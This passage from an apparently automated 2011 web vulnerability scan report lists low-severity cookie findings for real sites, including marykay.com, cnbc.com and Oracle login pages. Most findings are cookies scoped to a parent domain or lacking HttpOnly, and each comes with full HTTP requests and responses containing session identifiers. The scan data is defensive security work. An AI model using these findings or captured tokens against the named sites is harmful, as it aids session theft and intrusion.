Path:	/images/icn_vmo.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=1DB2B50F43E3F4D03BDF68AE8CA2AE7C; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icn_vmo.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1933
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "8f31666621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=1DB2B50F43E3F4D03BDF68AE8CA2AE7C; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................$....
...[SNIP]...

12.106. http://www.marykay.com/images/icn_yt.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/icn_yt.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=34430B6646F0AFCCDB0A7A9022E2E592; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icn_yt.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 3367
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "7797e6621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=34430B6646F0AFCCDB0A7A9022E2E592; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

.PNG
.
...IHDR.......$.....%..g....gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<....IDAThC.ZyPU..O.n..E.Z.4...Z..2j..L HQ.L.&...d...hTp#U.......S.4..`*..Z1.7.....Ux..... ..=..}..<.F.=s..s.=....
...[SNIP]...

12.107. http://www.marykay.com/images/ielogo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/ielogo.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=228F4B284CAFE25E42ECD3B80A8FB732; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ielogo.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1740
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:25 GMT
Accept-Ranges: bytes
ETag: "cf578c6621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=228F4B284CAFE25E42ECD3B80A8FB732; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

............................................................................................................J..
...[SNIP]...

12.108. http://www.marykay.com/images/searchbutton.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/images/searchbutton.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=F0C410BF4DA1CA468842AA86BA246468; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/searchbutton.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 239
Content-Type: image/gif
Last-Modified: Wed, 06 Apr 2011 17:12:22 GMT
Accept-Ranges: bytes
ETag: "99f3fcca7df4cb1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F0C410BF4DA1CA468842AA86BA246468; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

GIF89a......~OL~PN|ON...?++...............C.-@++B,,@,+~PL......|OL.ON.PO~ON....PN...........................!.......,.........l.d.V9.V...9...`t]...co..%Z.q..^4...1.|.....Mh.)...d. .T:m.(.,.|.$.l.$..
...[SNIP]...

12.109. http://www.marykay.com/scripts/i2a.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/scripts/i2a.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=F487BB6C456B8904C272E490A0B8A392; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/i2a.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1848
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT
Accept-Ranges: bytes
ETag: "80e28bcc7df4cb1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F487BB6C456B8904C272E490A0B8A392; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

var io = new Image();
var pageAction, price, sku, order_code, currency_id, user_defined1, user_defined2, user_defined3, user_defined4, ic_cat, ic_bu, ic_bc, ic_ch, ic_nso, altid, ic_type, urlA, prefi
...[SNIP]...

13. Cookie without HttpOnly flag set previous next
There are 262 instances of this issue:

http://afe.specificclick.net/
http://afe.specificclick.net/serve/v=5
http://blog.harbottle.com/dm/xmlrpc.php
http://convctr.overture.com/images/cc/cc.gif
http://data.cnbc.com/quotes
https://forums.oracle.com/forums/adfAuthentication
https://forums.oracle.com/forums/category.jspa
https://forums.oracle.com/forums/guestsettings!default.jspa
https://forums.oracle.com/forums/index.jspa
https://forums.oracle.com/forums/login!withRedirect.jspa
https://forums.oracle.com/forums/main.jspa
http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
http://pg.links.origin.channelintelligence.com/pages/wl.asp
http://pg.links.origin.channelintelligence.com/pages/wl.asp
http://pg.links.origin.channelintelligence.com/pages/wl.asp
http://pixel.adsafeprotected.com/jspix
http://pixel.everesttech.net/1688/i
https://register.cnbc.com/forgotPassword.do
https://register.cnbc.com/memberCenter.do
https://register.cnbc.com/registerUser.do
http://search.oracle.com/search/search
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
http://ttwbs.channelintelligence.com/
http://www.atg.com/svc-common/script/propertyFunc.js.jsp
http://a.tribalfusion.com/displayAd.js
http://a.tribalfusion.com/i.cid
http://a.tribalfusion.com/j.ad
http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html
http://a.tribalfusion.com/z/i.cid
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1182.iframe.120x60/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1205.iframe.120x60/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1206.iframe.120x60/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1209.iframe.120x60/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.46.iframe.120x60/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.721.iframe.120x60/**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321534**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315321844**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322154**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322464**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315322772**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323080**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323388**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315323696**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324005**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324313**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324623**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315324934**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.img.120x60/1315325243**
http://ad.yieldmanager.com/pixel
http://ads.pointroll.com/PortalServe/
http://ads.rnmd.net/getAds
http://api.bizographics.com/v1/profile.redirect
http://api.twitter.com/1/statuses/user_timeline.json
http://b.scorecardresearch.com/b
http://c.statcounter.com/t.php
http://clk.fetchback.com/serve/fb/click
http://clk.fetchback.com/serve/fb/engmnt
http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G
http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL
http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO
http://d.ads.readwriteweb.com/ck.php
http://d.ads.readwriteweb.com/spc.php
http://d1.openx.org/ck.php
http://developers.facebook.com/plugins/
http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi
http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage
http://imp.fetchback.com/serve/fb/adtag.js
http://imp.fetchback.com/serve/fb/imp
http://lct.salesforce.com/sfga.js
http://legolas.nexac.com/lgalt
https://login.cnbc.com/cas/logout
https://login.oracle.com/favicon.ico
https://login.oracle.com/mysso/signon.jsp
https://login.oracle.com/mysso/sso_loginui/b-bg.gif
https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif
https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif
https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif
https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif
https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif
https://login.oracle.com/mysso/sso_loginui/loginStyling.css
https://login.oracle.com/mysso/sso_loginui/moc_lib.js
https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif
https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif
https://login.oracle.com/mysso/sso_loginui/red-b-l.gif
https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif
https://login.oracle.com/mysso/sso_loginui/red-b-r.gif
https://login.oracle.com/mysso/sso_loginui/sso_check.js
https://login.oracle.com/mysso/sso_loginui/t-bg.gif
https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif
https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif
https://login.oracle.com/oam/server/sso/auth_cred_submit
https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
http://m1215.ic-live.com/522/
http://m1460.ic-live.com/586/
http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1
http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js
http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js
http://optimized-by.rubiconproject.com/a/dk.html
http://optimized-by.rubiconproject.com/a/dk.js
http://oracle.112.2o7.net/b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862
http://p.brilig.com/contact/bct
http://pi.pardot.com/analytics
http://ping.crowdscience.com/ping.js
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.quantserve.com/pixel
http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif
http://r.openx.net/img
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://register.cnbc.com/forgotPassword.do
http://register.cnbc.com/forgotpassword1.jsp
https://register.cnbc.com/
https://register.cnbc.com/RandomImage.jsp
https://register.cnbc.com/cas
https://register.cnbc.com/checkemail.do
https://register.cnbc.com/checkpassword.do
https://register.cnbc.com/checkscreenname.do
https://register.cnbc.com/checkzipcode.do
https://register.cnbc.com/createUser.do
https://register.cnbc.com/css/forgotPassword.css
https://register.cnbc.com/css/member_center_sytles.css
https://register.cnbc.com/css/newRegistration.css
https://register.cnbc.com/css/registration.css
https://register.cnbc.com/email/EmailSupport.jsp
https://register.cnbc.com/favicon.ico
https://register.cnbc.com/forgotPassword1.do
https://register.cnbc.com/forgotpassword1.jsp
https://register.cnbc.com/images/clickToContinue.gif
https://register.cnbc.com/images/loaderImage.gif
https://register.cnbc.com/images/memberCenterHeader.jpg
https://register.cnbc.com/images/submitPreferences.jpg
https://register.cnbc.com/images/tick.jpg
https://register.cnbc.com/images/tile_02.gif
https://register.cnbc.com/images/wrong.jpg
https://register.cnbc.com/js/membercenter.js
https://register.cnbc.com/js/prototype_ajax.js
https://register.cnbc.com/js/registrationBasic.js
https://register.cnbc.com/js/registrationUtils.js
https://register.cnbc.com/js/registrationValidations.js
https://register.cnbc.com/js/s_code.js
https://register.cnbc.com/js/validation.js
https://register.cnbc.com/quote-html-webservice/fvquote.htm
https://register.cnbc.com/quote-html-webservice/quote.htm
https://register.cnbc.com/refreshlogin.jsp
http://rt.legolas-media.com/lgrt
http://search.spotxchange.com/track/tag/6382.1008/img
http://server.iad.liveperson.net/hc/52793056/
http://services.krxd.net/geoip
http://services.krxd.net/pixel.gif
http://sophelle.app5.hubspot.com/salog.js.aspx
http://statse.webtrendslive.com/dcscnww13100008eg8v7k3x39_3j3x/dcs.gif
http://t2.trackalyzer.com/trackalyze.asp
http://t5.trackalyzer.com/trackalyze.asp
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf
http://tags.bluekai.com/site/3834
http://tenzing.fmpub.net/
http://ticker.cnbc.com/
http://www.actonsoftware.com/acton/bn/1227/visitor.gif
http://www.bizographics.com/collect/
http://www.cnbc.com/
http://www.cnbc.com/id/15837856
http://www.cnbc.com/id/15837856/site/14081545/
http://www.cnbc.com/id/15838394
http://www.cnbc.com/id/15839263/
http://www.cnbc.com/pointrollads.htm
http://www.csc.com/cybersecurity/contact_us
http://www.csc.com/search
http://www.csc.com/services
http://www.csc.com/utils/live_search
http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp
http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp
http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp
http://www.gillettevenus.com/en_US/razor_finder/index.jsp
http://www.gillettevenus.com/en_US/search/index.jsp
http://www.googleadservices.com/pagead/aclk
http://www.marykay.com/
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg
http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js
http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf
http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf
http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf
http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf
http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf
http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf
http://www.marykay.com/Content/HPflash/502_moc.swf
http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf
http://www.marykay.com/IMAGES/bkgLong.gif
http://www.marykay.com/Images/Checkout/viewbag/btn_x.png
http://www.marykay.com/Images/Site/FooterBack1.gif
http://www.marykay.com/Images/Site/hdottedline.gif
http://www.marykay.com/Images/Site/searchbox.gif
http://www.marykay.com/Images/Site/vdottedline.gif
http://www.marykay.com/Images/Site/wholeheader.jpg
http://www.marykay.com/JS/swfobject.js
http://www.marykay.com/Menu.css
http://www.marykay.com/Scripts/HeaderScript.js
http://www.marykay.com/Scripts/jquery-1.4.2.min.js
http://www.marykay.com/Styles.css
http://www.marykay.com/Styles_US.css
http://www.marykay.com/Themes/TabMenu/US/tabs.css
http://www.marykay.com/Themes/TabMenu/tabs.js
http://www.marykay.com/content/HPflash/portfolio_mk.xml
http://www.marykay.com/content/hpflash/stage.swf
http://www.marykay.com/default.aspx
http://www.marykay.com/favicon.ico
http://www.marykay.com/images/fflogo.jpg
http://www.marykay.com/images/icn_ec.jpg
http://www.marykay.com/images/icn_fb.jpg
http://www.marykay.com/images/icn_pbp.jpg
http://www.marykay.com/images/icn_vmo.jpg
http://www.marykay.com/images/icn_yt.jpg
http://www.marykay.com/images/ielogo.jpg
http://www.marykay.com/images/searchbutton.gif
http://www.marykay.com/scripts/i2a.js
http://www.sapient.com/en-us/about-sapient/alliances.html
http://www.sapient.com/en-us/about-sapient/alliances/atg.html
http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html
http://www.sapient.com/en-us/search.html
http://www.tenzing.com/atg-ecommerce-hosting.asp
http://www2.znode.com/analytics

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

13.1. http://afe.specificclick.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://afe.specificclick.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=fb406049426234e5945296c2a152; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: afe.specificclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
X-Powered-By: JSP/2.1
Set-Cookie: JSESSIONID=fb406049426234e5945296c2a152; Path=/
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 17:05:55 GMT
Connection: close
Vary: Accept-Encoding

13.2. http://afe.specificclick.net/serve/v=5 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://afe.specificclick.net
Path:	/serve/v=5

Issue detail

